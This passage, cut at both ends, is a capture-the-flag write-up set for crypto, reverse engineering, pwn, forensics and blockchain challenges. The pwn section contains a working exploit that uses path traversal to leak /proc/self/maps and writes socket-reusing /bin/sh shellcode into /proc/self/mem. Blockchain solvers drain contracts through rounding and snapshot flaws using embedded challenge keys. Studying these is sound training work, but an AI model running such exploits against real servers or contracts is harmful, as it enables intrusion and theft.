            with open("debug.log", "a") as f:
                f.write("Payload sent. Waiting for response...\n")
            
            # Wait for response
            while True:
                try:
                    # Use recvuntil with a large buffer or just loop until i get the line
                    line_bytes = p.recvuntil(b'\n').strip()
                    resp = line_bytes.decode(errors='ignore')
                    if resp.startswith("ct_big"):
                        break
                    if "nope" in resp:
                        log.info("Plagiarism check failed (shouldn't happen with 3 diffs)")
                        break
                except EOFError:
                    break
            
            if not resp or not resp.startswith("ct_big"):
                p.close()
                continue

            # Parse ct_big
            ct_hex_part = resp.split('=', 1)[1].strip()
            ct_big = ast.literal_eval(ct_hex_part)

            # Try to get ct_pants as well
            ct_pants = None
            try:
                # Loop to find ct_pants, expecting it within a few lines
                for _ in range(5):
                    line_bytes = p.recvuntil(b'\n', timeout=5).strip()
                    resp2 = line_bytes.decode(errors='ignore')
                    with open("debug.log", "a") as f:
                        f.write(f"Got resp2 line: {resp2[:100]}...\n")
                    if resp2.startswith("ct_pants"):
                        ct_hex_part2 = resp2.split('=', 1)[1].strip()
                        ct_pants = ast.literal_eval(ct_hex_part2)
                        break
            except Exception as e:
                with open("debug.log", "a") as f:
                    f.write(f"Failed to get ct_pants: {e}\n")
                pass
            
            # Helper function to decrypt at specific offset
            def decrypt_at_offset(ciphertext, known_ct, offset, label):
                if not ciphertext or offset + len(known_ct) > len(ciphertext):
                    return None
                
                try:
                    decrypted = bytearray()
                    for i in range(len(known_ct)):
                        decrypted.append(known_ct[i] ^ ciphertext[offset+i] ^ 0x41)
                    val = bytes(decrypted)
                    log.success(f"Decrypted {label} at offset {offset}: {val}")
                    print(f"{label}: {val}")
                    return val
                except:
                    return None

            # Scan loop
            found_flag = False
            for k in range(max_blocks):
                offset = k * 16
                if offset + 4 > len(ct_big):
                    break
                    
                try:
                    # Check FLAG1 header
                    c0 = flag1_ct[0] ^ ct_big[offset] ^ 0x41
                    c1 = flag1_ct[1] ^ ct_big[offset+1] ^ 0x41
                    c2 = flag1_ct[2] ^ ct_big[offset+2] ^ 0x41
                    c3 = flag1_ct[3] ^ ct_big[offset+3] ^ 0x41
                    
                    if bytes([c0, c1, c2, c3]) == b'C2C{':
                        log.success(f"Found FLAG1 match at block {k} (offset {offset})!")
                        
                        flag1 = decrypt_at_offset(ct_big, flag1_ct, offset, "FLAG1")
                        
                        # Use SAME offset for FLAG2
                        if ct_pants:
                           flag2 = decrypt_at_offset(ct_pants, flag2_ct, offset, "FLAG2")
                        else:
                           log.warning("ct_pants missing, cannot recover FLAG2")
                        
                        found_flag = True
                        break
                except Exception:
                    continue
            
            if found_flag:
                break
            else:
                log.info("Flag not found in this attempt (wrong direction?), retrying...")
                p.close()
                
        except Exception as e:
            with open("debug.log", "a") as f:
                f.write(f"Exception: {e}\n")
            log.error(f"Error: {e}")
            p.close()
            pass

        except Exception as e:
            log.error(f"Error: {e}")
            p.close()
            time.sleep(1)

if __name__ == "__main__":
    solve()

Final Flag

C2C{5d6d98ac-68de-4257-9e3a-59686514d0fd9a0e0ca79875}


Reverse Engineering

Bunaken

Challenge Overview

  • Category: Reverse Engineering
  • Provided Files: bunaken (Binary), flag.txt (Encrypted)
  • Goal: Reverse the binary to determine the encryption algorithm and key, then decrypt the flag.

Initial Analysis

  • File Identification:
    • file bunaken: 64-bit ELF executable.
    • strings bunaken: Contains references to Bun, JavaScriptCore, and typical JS strings.
    • Conclusion: This is a standalone Bun runtime executable. Bun apps often append the JS source to the end of the binary.

Binary Reversing / Deobfuscation

Step 1: Extraction I located the start of the bundled JavaScript payload by inspecting the end of the binary (using tail or a hex editor). The payload starts with a large array and obfuscated logic.

Step 2: Deobfuscation Analysis The script uses a string-hiding technique:

  1. String Array: A minimal array n is defined (e.g., ["WR0...", "toString", ...]).
  2. Rotation (Shuffle): An IIFE (Immediately Invoked Function Expression) rotates this array continuously until a specific checksum/condition is met (checking parseInt values). This restores the correct order of strings.
  3. Decoders:
    • l(index): Simple offset-based retrieval (index - 367).
    • c(index, key): retrieved a base64-encoded string and applied an RC4-like XOR decryption using the provided character key.

Step 3: Protocol Reconstruction By emulating the deobfuscation logic (running the extraction script in Node.js), I resolved the critical API calls:

  • s(373, "rG]G") -> sulawesi
  • s(387) -> zstdCompress
  • t(402) -> digest, r(399) -> SHA-256
  • t(375) -> AES-CBC

The Algorithm:

  1. Compression: Input data is compressed using Bun.zstdCompress.
  2. Key Derivation: key = SHA-256("sulawesi").slice(0, 16).
  3. Encryption: AES-CBC with a random 16-byte IV.
  4. Output: Concatenated IV + Ciphertext.

Flag Validation

The script writes the output to flag.txt.bunakencrypted. To reverse it, i must simply invert the operations in reverse order: separate IV, decrypt AES, decompress Zstd.

Exploitation / Solver

Solver Script:

import base64
import hashlib
import zstandard as zstd
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend

def solve():
    # 1. Read Encrypted File
    try:
        with open("flag.txt.bunakencrypted", "r") as f:
            b64_data = f.read().strip()
    except FileNotFoundError:
        print("[-] flag.txt.bunakencrypted not found.")
        return

    data = base64.b64decode(b64_data)
    
    # 2. Extract IV and Ciphertext
    iv = data[:16]
    ciphertext = data[16:]
    
    # 3. Derive Key
    key = hashlib.sha256(b"sulawesi").digest()[:16]
    
    # 4. Decrypt AES-CBC
    cipher = Cipher(algorithms.AES(key), modes.CBC(iv), backend=default_backend())
    decryptor = cipher.decryptor()
    decrypted_padded = decryptor.update(ciphertext) + decryptor.finalize()
    
    # 5. Decompress Zstd
    dctx = zstd.ZstdDecompressor()
    try:
        # Zstd usually handles its own framing, but i might have padding from AES
        # Attempt to decompress the whole buffer; Zstd ignores trailing garbage usually
        flag = dctx.decompress(decrypted_padded)
        print(f"[+] Flag: {flag.decode()}")
    except Exception as e:
        print(f"[-] Decompression failed: {e}")
        # Try stripping standard PKCS7 padding manually if strictly required
        # (Though Zstd decompressor is robust)

if __name__ == "__main__":
    solve()

Final Flag

C2C{BUN_AwKward_ENcryption_compression_obfuscation}


Pwn

NS3

Challenge Overview

  • Category: Pwn
  • Goal: achieve Remote Code Execution (RCE) on the custom HTTP server.

Vulnerability Analysis

The C++ server src/server.cpp has two critical flaws:

  1. Path Traversal: The process_get and process_put functions use open(path.c_str(), ...) directly with user input. A path like ../../../../proc/self/maps is valid.
  2. Unsafe Memory Handling: The server runs with permissions that allow writing to /proc/self/mem (its own memory), bypassing standard W^X (Write XOR Execute) protections.

Exploitation / Solver

Methodology:

  1. ASLR Bypass: Send a GET request for /proc/self/maps. Parse the output to find the base address of the server binary segment.
  2. Binary Extraction (Optional but useful): Download /proc/self/exe to analyze offsets locally.
  3. Code Execution:
    • Ideally, i want to execute shellcode.
    • im target the Server::send_response function, which is called at the end of the process_put handler.
    • im construct a shellcode payload that reuses the existing socket (looping FDs 3-10) and spawns /bin/sh.
    • im send a PUT request to /proc/self/mem targeting the address of send_response (Base + Offset).
    • The payload overwrites the function code. When the server tries to send the response, it executes our shellcode.

Solver Script:


import requests
import re
from pwn import *
import time

context.arch = 'amd64'
context.os = 'linux'

HOST = 'challenges.1pc.tf'
PORT = 23158
URL = f'http://{HOST}:{PORT}'

def download_binary():
    print("[*] Downloading binary...")
    r = requests.get(f'{URL}/?path=../../../../proc/self/exe', stream=True)
    with open('server_leaked', 'wb') as f:
        for chunk in r.iter_content(chunk_size=8192):
            f.write(chunk)
    print("[+] Binary downloaded as 'server_leaked'")

def get_base_address():
    print("[*] Leaking /proc/self/maps...")
    r = requests.get(f'{URL}/?path=../../../../proc/self/maps')
    for line in r.text.splitlines():
        if 'server' in line and 'r--p' in line: # Try to find r-xp or r--p, usually the first one is text base
             # The permissions might be r-xp or r--p depending on kernel/linker
             parts = line.split('-')
             base = int(parts[0], 16)
             print(f"[+] Leaked Base Address: {hex(base)}")
             return base
    
    # Fallback: just take the very first line
    line = r.text.splitlines()[0]
    parts = line.split('-')
    base = int(parts[0], 16)
    print(f"[+] Leaked Base Address (Fallback): {hex(base)}")
    return base

def exploit():
    # 1. Download Binary to find offsets
    if not os.path.exists('server_leaked'):
        download_binary()
    
    elf = ELF('server_leaked')
    # i need to overwrite a function that is called after i write to memory.
    # process_put calls send_response at the end.
    # void Server::process_put(...) { ... send_response(client_fd, 204, "No Content"); }
    # So if i overwrite send_response, it should trigger.
    
    # However, process_put is called inside handle_client loop.
    # The server is multi-process (fork). modifying /proc/self/mem affects the CURRENT process.
    # So i must do it in one connection (Keep-Alive is enabled).
    
    target_sym = '_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'
    # Mangled name for Server::send_response. better to look it up by name if possible.
    try:
        offset = elf.functions['_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'].address
    except KeyError:
        # Try to find by demangled name or just pick one
        print("[-] Could not find symbol by name, trying to find by iterating symbols...")
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                offset = addr
                print(f"[+] Found symbol {sym} at {hex(offset)}")
                break
        else:
             print("[-] Failed to find send_response offset")
             return

    print(f"[+] Offset of send_response: {hex(offset)}")
    
    # 2. Leak ASLR
    # i need to do this in a new session or same?
    # Ideally i can calculate base from maps.
    base_addr = get_base_address()
    target_addr = base_addr + offset
    print(f"[+] Target Address (send_response): {hex(target_addr)}")
    
    # 3. Construct Shellcode
    # Connect back shell or reuse socket?
    # Reuse socket is best. FD is likely 4.
    # i can try to dupe 3,4,5,6 to 0,1,2
    
    shellcode = asm("""
        /* reuse socket fd */
        /* loop FDs 3 to 10 to find socket */
        xor rbx, rbx
        mov bl, 3
    loop_fds:
        cmp bl, 10
        jg exec_sh
        
        /* dup2(fd, 0) */
        mov rax, 33
        mov rdi, rbx
        xor rsi, rsi
        syscall
        
        /* dup2(fd, 1) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 1
        syscall
        
        /* dup2(fd, 2) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 2
        syscall

        inc rbx
        jmp loop_fds

    exec_sh:
        /* execve("/bin/sh") */
        mov rax, 59
        lea rdi, [rip+binsh]
        xor rsi, rsi
        xor rdx, rdx
        syscall
    
    binsh:
        .string "/bin/sh"
    """)
    
    print(f"[+] Shellcode length: {len(shellcode)}")
    
    # 4. Write Shellcode via PUT to /proc/self/mem
    # i need to seek to target_addr.
    # process_put(path, offset, content)
    # path = /proc/self/mem
    # offset = target_addr
    
    print("[*] Sending Exploit...")
    
    # Use raw socket to ensure i keep connection for the trigger?
    # Actually requests Session should handle keep-alive.
    s = requests.Session()
    
    # First, just to be sure i have a session and stick to one process
    s.get(f'{URL}/')
    
    # Now PUT the shellcode
    # URL encoded path? path parameter is in query string.
    # /?path=../../../../proc/self/mem&offset=TARGET_ADDR&method=PUT (no method param, it uses HTTP method)
    # The code checks method == "PUT".
    
    files = {'dummy': 'dummy'} # requests might force POST if data is present, need to force PUT
    # Using data=shellcode
    
    # The server uses `req.offset` from query param `offset`.
    put_url = f'{URL}/?path=../../../../proc/self/mem&offset={target_addr}'
    
    # i need to verify if the server accepts body in PUT.
    # Yes: process_put(..., req.body)
    
    r = s.put(put_url, data=shellcode)
    
    print(f"[*] Exploit sent. Status: {r.status_code}")
    
    # Now i should have interaction?
    # If the shellcode executed, it might have taken over the connection.
    # But `process_put` calls `send_response` AFTER `write`.
    # `send_response` is what i overwrote.
    # So `process_put` -> `write` (ok) -> `close` (mem fd) -> `send_response` (SHELLCODE)
    
    # So the current connection `s` should now be hooked to /bin/sh.
    # But requests might wait for HTTP response.
    # i should probably use pwntools for the final interaction.
    
    # Let's switch to pwntools for the exploitation part to handle the socket better.
    return

def pwn_exploit():
    if not os.path.exists('server_leaked'):
        download_binary()
        
    elf = ELF('server_leaked')
    # Find send_response offset
    # _ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_
    # i can also just search for the function prelude if symbols are stripped.
    # But let's assume symbols exist since it's a CTF challenge not explicitly stripped.
    
    try:
        # direct name lookup
        offset = elf.functions['_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'].address
    except:
        # manual search in symbols
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                offset = addr
                break
        else:
            log.error("Could not find send_response symbol")
            return

    log.info(f"Offset: {hex(offset)}")
    
    # Leak Maps
    r = remote(HOST, PORT)
    r.sendline(b'GET /?path=../../../../proc/self/maps HTTP/1.1\r\nHost: localhost\r\n\r\n')
    
    maps = b""
    try:
        maps = r.recvall(timeout=2)
    except:
        pass

    if not maps:
        log.error("Failed to leak maps")
        return

    print("[*] Maps content:")
    print(maps.decode(errors='replace'))
    
    # Parse maps to find base address
    base_addr = 0
    # Look for the first line with 'server' and 'r--p' (read-only, private - usually the header/first segment)
    # If not found, look for 'r-xp' and subtract offset.
    
    lines = maps.splitlines()
    for line in lines:
        if b'server' in line and b'r--p' in line:
            parts = line.split(b'-')
            base_addr = int(parts[0], 16)
            log.info(f"Found base address from r--p segment: {hex(base_addr)}")
            break
            
    if base_addr == 0:
        # Try r-xp
        for line in lines:
            if b'server' in line and b'r-xp' in line:
                # 7a...-7a... r-xp offset ...
                parts = line.split()
                start_addr = int(parts[0].split(b'-')[0], 16)
                offset_val = int(parts[2], 16)
                base_addr = start_addr - offset_val
                log.info(f"Calculated base address from r-xp segment: {hex(base_addr)}")
                break
                
    if base_addr == 0:
        log.error("Could not determine base address")
        return

    elf.address = base_addr
    
    # Recalculate offset using pwntools ELF with base set
    try:
        target_addr = elf.functions['_ZN6Server13send_responseEiRKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEES7_'].address
    except:
        # Fallback search
        for sym, addr in elf.symbols.items():
            if 'send_response' in sym:
                # elf.symbols are already relocated if elf.address is set?
                # No, symbols.items() returns relative address? 
                # Wait, pwntools ELF.functions returns absolute address if elf.address is set.
                # ELF.symbols returns absolute address if elf.address is set.
                target_addr = addr # This is absolute now
                break
    
    log.info(f"Base Address: {hex(base_addr)}")
    log.info(f"Target overwrite address: {hex(target_addr)}")
    
    r.close()
    
    # New connection for exploitation
    r = remote(HOST, PORT)
    
    shellcode = asm("""
        /* reuse socket fd */
        xor rbx, rbx
        mov bl, 3
    loop_fds:
        cmp bl, 10
        jg exec_sh
        
        /* dup2(fd, 0) */
        mov rax, 33
        mov rdi, rbx
        xor rsi, rsi
        syscall
        
        /* dup2(fd, 1) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 1
        syscall
        
        /* dup2(fd, 2) */
        mov rax, 33
        mov rdi, rbx
        mov rsi, 2
        syscall

        inc rbx
        jmp loop_fds

    exec_sh:
        /* execve("/bin/sh", ["/bin/sh", 0], 0) */
        mov rax, 59
        lea rdi, [rip+binsh]
        
        /* construct argv array on stack */
        xor rdx, rdx
        push rdx          /* null terminator */
        push rdi          /* pointer to "/bin/sh" */
        mov rsi, rsp      /* rsi -> argv */
        
        xor rdx, rdx      /* envp = NULL */
        syscall
    
    binsh:
        .string "/bin/sh"
    """)
    
    payload = shellcode
    content_length = len(payload)
    
    # PUT request
    req = f'PUT /?path=../../../../proc/self/mem&offset={target_addr} HTTP/1.1\r\n'
    req += f'Host: {HOST}\r\n'
    req += f'Content-Length: {content_length}\r\n'
    req += 'Connection: keep-alive\r\n'
    req += '\r\n'
    
    r.send(req.encode() + payload)
    
    # Interaction
    time.sleep(1)
    r.sendline(b'cat /flag*')
    flag = r.recvall(timeout=5)
    print(f"[+] Flag: {flag.decode(errors='replace').strip()}")
    r.close()

if __name__ == "__main__":
    pwn_exploit()

The provided solver uses pwntools and requests to automate the ASLR leak and memory overwrite.

Final Flag

C2C{lINux_Fi1e_SyS7Em_1S_qU1te_MlND_8lowlng_l5n't_lT_9f614b3b839b?}


Forensics

Log

Challenge Overview

  • Category: Forensics
  • Goal: Reconstruct a SQL injection attack from Apache logs.

Forensics Analysis

Methodology:

  1. Identification:
    • Tool: awk, sort, uniq.
    • Command: awk '{print $1}' access.log | sort | uniq -c.
    • Finding: 219.75.27.16 is the primary attacker.
  2. Vulnerability Confirmation:
    • Tool: grep.
    • Observation: Queries containing UNION, SELECT, and SLEEP(5) confirm Time-based Blind SQLi.
    • Target: wp_easy-quotes-files table.
  3. Data Extraction:
    • The attacker used boolean inference: IF(ORD(MID(..., i, 1)) != <CHAR>, SLEEP(5), 0).
    • If the response was fast (no sleep), the character matched.
    • im parsed the logs to extract the characters where the condition != was false (i.e., NO sleep).
    • Recovered: [email protected] and hash $wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW.
from pwn import *

answers = ["182.8.97.244", "219.75.27.16", "6", "Easy Quotes","CVE-2025-26943", "sqlmap/1.10.1.21", "[email protected]", "$wp$2y$10$vMTERqJh2IlhS.NZthNpRu/VWyhLWc0ZmTgbzIUcWxwNwXze44SqW", "11/01/2026 13:12:49", ""]
HOST = 'challenges.1pc.tf'
PORT = 23065

p = remote(HOST, PORT)
print(p.recvuntil(b"Your Answer: ").decode())

for answer in answers:
    try:
        p.sendline(answer.encode())
        print(p.recvuntil(b"Your Answer: ").decode())
    except EOFError:
        print(p.recvall().decode())
        break

Final Flag

C2C{7H15_15_V3rY_345Y_3f968f28ffa4}

React

Challenge Overview

  • Category: Forensics
  • Goal: Decrypt C2 traffic from a PCAP file.

Forensics Analysis

Methodology:

  1. Traffic Analysis (tshark / Wireshark):
    • Identified malicious scans and HTTP exploits from 192.168.56.104 to port 3000.
    • Exploit: Next.js CVE-2025-55182 (Prototype Pollution RCE).
  2. C2 Crypto-Analysis:
    • Identified suspicious TLS traffic on port 4433.
    • Extracted the Server Certificate.
    • Weakness: The RSA key was weak (factorizable). i factored the modulus to recover the Private Key.
    • Decrypted the TLS stream using the private key.
  3. Malware Deobfuscation:
    • Extracted the downloaded python agent a.py.
    • Deobfuscated the 32 layers of zlib/base64 to find the TrevorC2 cipher key: aa34042ac9c17b459b93c0d49c7124ea.
  4. Command Recovery:
    • Decrypted the C2 commands hidden in HTML comments using the key.
    • Revealed the flag in the persistence command.

Final Flag

C2C{r34C725h3Ll_f0r_7H3_W1n_8995bba8e58d}


Blockchain

Nexus

Challenge Overview

  • Category: Blockchain
  • Goal: Drain the contract.

Vulnerability Analysis

Integer Division Error: The essenceTocrystal function calculates (amount * totalCrystals) / amplitude(). By manipulating the amplitude (denominator) to be extremely large, the result rounds down to 0. This allows the Setup contract’s deposit to yield 0 crystals, diluting the pool for the attacker’s benefit.

import os
import json
from web3 import Web3

RPC_URL = "http://challenges.1pc.tf:31123/a8a74bd2-c60f-461e-b871-3198a00fc2c0"
PLAYER_KEY = "3e79ccbcb0458f37cb34901d21bf6e7c715c048c30deb42f20168719dca99074"
SETUP_ADDR = "0x9F61B1268902DB0372E9ae29387B4D4aBAb428B2"
WALLET_ADDR = "0x45BCfa7E902D44BB17052997aBd01Db3C4e3BEb8"
# Minimal ABIs
SETUP_ABI = [
    {"inputs":[],"name":"nexus","outputs":[{"internalType":"contract CrystalNexus","name":"","type":"address"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"essence","outputs":[{"internalType":"contract Essence","name":"","type":"address"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"conductRituals","outputs":[],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[],"name":"isSolved","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"}
]

NEXUS_ABI = [
    {"inputs":[{"internalType":"uint256","name":"essenceAmount","type":"uint256"}],"name":"attune","outputs":[{"internalType":"uint256","name":"crystals","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[{"internalType":"uint256","name":"crystalAmount","type":"uint256"},{"internalType":"address","name":"recipient","type":"address"}],"name":"dissolve","outputs":[{"internalType":"uint256","name":"essenceOut","type":"uint256"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[],"name":"totalCrystals","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"crystalBalance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[],"name":"amplitude","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}
]

ESSENCE_ABI = [
    {"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},
    {"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},
    {"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}
]

def main():
    w3 = Web3(Web3.HTTPProvider(RPC_URL))
    if not w3.is_connected():
        print("Failed to connect to RPC")
        return

    print(f"Connected to {RPC_URL}")
    
    account = w3.eth.account.from_key(PLAYER_KEY)
    print(f"Player Address: {account.address}")

    setup = w3.eth.contract(address=SETUP_ADDR, abi=SETUP_ABI)
    nexus_addr = setup.functions.nexus().call()
    essence_addr = setup.functions.essence().call()
    
    nexus = w3.eth.contract(address=nexus_addr, abi=NEXUS_ABI)
    essence = w3.eth.contract(address=essence_addr, abi=ESSENCE_ABI)
    
    print(f"Nexus: {nexus_addr}")
    print(f"Essence: {essence_addr}")

    # Step 0: Approve Essence for Nexus
    print("Approving Nexus to spend Essence...")
    nonce = w3.eth.get_transaction_count(account.address)
    
    tx = essence.functions.approve(nexus_addr, 2**256 - 1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 100000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Approved.")
    nonce += 1

    # Step 1: Attune 1 wei
    print("Attuning 1 wei...")
    tx = nexus.functions.attune(1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Attuned 1 wei.")
    nonce += 1

    # Check state
    total = nexus.functions.totalCrystals().call()
    print(f"Total Crystals: {total}")

    # Step 1.5: Transfer REMAINING ether to Nexus to spike Amplitude
    # This ensures Setup gets 0 crystals when it attunes.
    bal = essence.functions.balanceOf(account.address).call()
    print(f"Transferring {bal} wei to Nexus...")
    tx = essence.functions.transfer(nexus_addr, bal).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Transferred essence.")
    nonce += 1
    
    # Verify Amplitude
    amp = nexus.functions.amplitude().call()
    print(f"Current Amplitude: {amp}")

    # Step 2: Call conductRituals
    print("Calling conductRituals on Setup...")
    tx = setup.functions.conductRituals().build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 500000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Rituals conducted.")
    nonce += 1

    # Check state again
    total = nexus.functions.totalCrystals().call()
    print(f"Total Crystals after rituals: {total}")
    # Setup should have failed to get crystals if exploit worked
    
    
    # Step 3: Dissolve our 1 crystal
    # i should have 1 crystal which owns the ENTIRE pot
    my_crystals = nexus.functions.crystalBalance(account.address).call()
    print(f"My Crystals: {my_crystals}")
    
    if my_crystals > 0:
        print(f"Dissolving {my_crystals} crystals (Round 1)...")
        tx = nexus.functions.dissolve(my_crystals, account.address).build_transaction({
            'from': account.address,
            'nonce': nonce,
            'gas': 200000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
        w3.eth.wait_for_transaction_receipt(tx_hash)
        print("Dissolved Round 1.")
        nonce += 1

    # Check state
    total = nexus.functions.totalCrystals().call()
    amp = nexus.functions.amplitude().call()
    print(f"Total Crystals: {total}")
    print(f"Amplitude (Leftover Friction): {w3.from_wei(amp, 'ether')}")

    # Step 4: Re-enter to claim friction
    # Total crystals is 0, so i can buy in 1:1
    print("Attuning 1 wei (Round 2)...")
    tx = nexus.functions.attune(1).build_transaction({
        'from': account.address,
        'nonce': nonce,
        'gas': 200000,
        'gasPrice': w3.eth.gas_price
    })
    signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
    tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
    w3.eth.wait_for_transaction_receipt(tx_hash)
    print("Attuned 1 wei.")
    nonce += 1

    # Step 5: Dissolve again
    my_crystals = nexus.functions.crystalBalance(account.address).call()
    if my_crystals > 0:
        print(f"Dissolving {my_crystals} crystals (Round 2)...")
        tx = nexus.functions.dissolve(my_crystals, account.address).build_transaction({
            'from': account.address,
            'nonce': nonce,
            'gas': 200000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, PLAYER_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.raw_transaction)
        w3.eth.wait_for_transaction_receipt(tx_hash)
        print("Dissolved Round 2.")
        nonce += 1

    # Verify Solved
    is_solved = setup.functions.isSolved().call()
    final_balance = essence.functions.balanceOf(account.address).call()
    print(f"Final Essence Balance: {w3.from_wei(final_balance, 'ether')}")
    print(f"isSolved: {is_solved}")

if __name__ == "__main__":
    main()

Final Flag

C2C{the_essence_of_nexus_is_donation_hahahaha}

TGE

Challenge Overview

  • Category: Blockchain
  • Goal: Bypass snapshot logic to upgrade token tier.

Vulnerability Analysis

Logical Flaw: The setTgePeriod function allows a user to toggle the TGE state. By disabling it (false), the attacker triggers a “snapshot” while their balance is 0. Then, re-enabling it allows them to mint tokens after the snapshot. The upgrade check compares current balance against the (empty) snapshot, allowing the upgrade.

import os
import sys
from web3 import Web3
from web3.middleware import geth_poa_middleware

# Configuration
RPC_URL = "http://challenges.1pc.tf:45975/df3dd25c-dcc4-4809-8fe6-67bd5101da75"
PRIVATE_KEY = "0650cbd94d509195678850932a60305d68da8b5fb5852ca889ac9e2e1c0a93c9"
SETUP_ADDRESS = "0x2C0bce02bc40050B605734ad828e92DF5C66829D"
PLAYER_ADDRESS = "0x2A2b61560dec956aaf6B89D2aC7A5ff608F66EE5"
# Minimal ABIs
SETUP_ABI = [
    {"inputs": [], "name": "tge", "outputs": [{"internalType": "contract TGE", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"},
    {"inputs": [], "name": "token", "outputs": [{"internalType": "contract Token", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"},
    {"inputs": [{"internalType": "bool", "name": "_tge", "type": "bool"}], "name": "enableTge", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [], "name": "isSolved", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "view", "type": "function"}
]

TGE_ABI = [
    {"inputs": [], "name": "buy", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [{"internalType": "uint256", "name": "tier", "type": "uint256"}], "name": "upgrade", "outputs": [], "stateMutability": "nonpayable", "type": "function"},
    {"inputs": [], "name": "owner", "outputs": [{"internalType": "address", "name": "", "type": "address"}], "stateMutability": "view", "type": "function"}
]

TOKEN_ABI = [
    {"inputs": [{"internalType": "address", "name": "spender", "type": "address"}, {"internalType": "uint256", "name": "amount", "type": "uint256"}], "name": "approve", "outputs": [{"internalType": "bool", "name": "", "type": "bool"}], "stateMutability": "nonpayable", "type": "function"}
]

def main():
    w3 = Web3(Web3.HTTPProvider(RPC_URL))
    w3.middleware_onion.inject(geth_poa_middleware, layer=0)

    if not w3.is_connected():
        print("Failed to connect to RPC")
        return

    account = w3.eth.account.from_key(PRIVATE_KEY)
    print(f"Connected as {account.address}")
    
    setup_contract = w3.eth.contract(address=SETUP_ADDRESS, abi=SETUP_ABI)
    
    # Get contracts
    tge_addr = setup_contract.functions.tge().call()
    token_addr = setup_contract.functions.token().call()
    print(f"TGE Address: {tge_addr}")
    print(f"Token Address: {token_addr}")

    tge_contract = w3.eth.contract(address=tge_addr, abi=TGE_ABI)
    token_contract = w3.eth.contract(address=token_addr, abi=TOKEN_ABI)

    def send_tx(func):
        tx = func.build_transaction({
            'from': account.address,
            'nonce': w3.eth.get_transaction_count(account.address),
            'gas': 2000000,
            'gasPrice': w3.eth.gas_price
        })
        signed_tx = w3.eth.account.sign_transaction(tx, private_key=PRIVATE_KEY)
        tx_hash = w3.eth.send_raw_transaction(signed_tx.rawTransaction)
        receipt = w3.eth.wait_for_transaction_receipt(tx_hash)
        if receipt.status == 1:
            print(f"Transaction successful: {func.fn_name}")
        else:
            print(f"Transaction failed: {func.fn_name}")
            sys.exit(1)
            
    # Step 1: Approve TGE to spend tokens (15 tokens required for Tier 1)
    print("Approving tokens...")
    send_tx(token_contract.functions.approve(tge_addr, 15))

    # Step 2: Buy Tier 1
    print("Buying Tier 1...")
    send_tx(tge_contract.functions.buy())
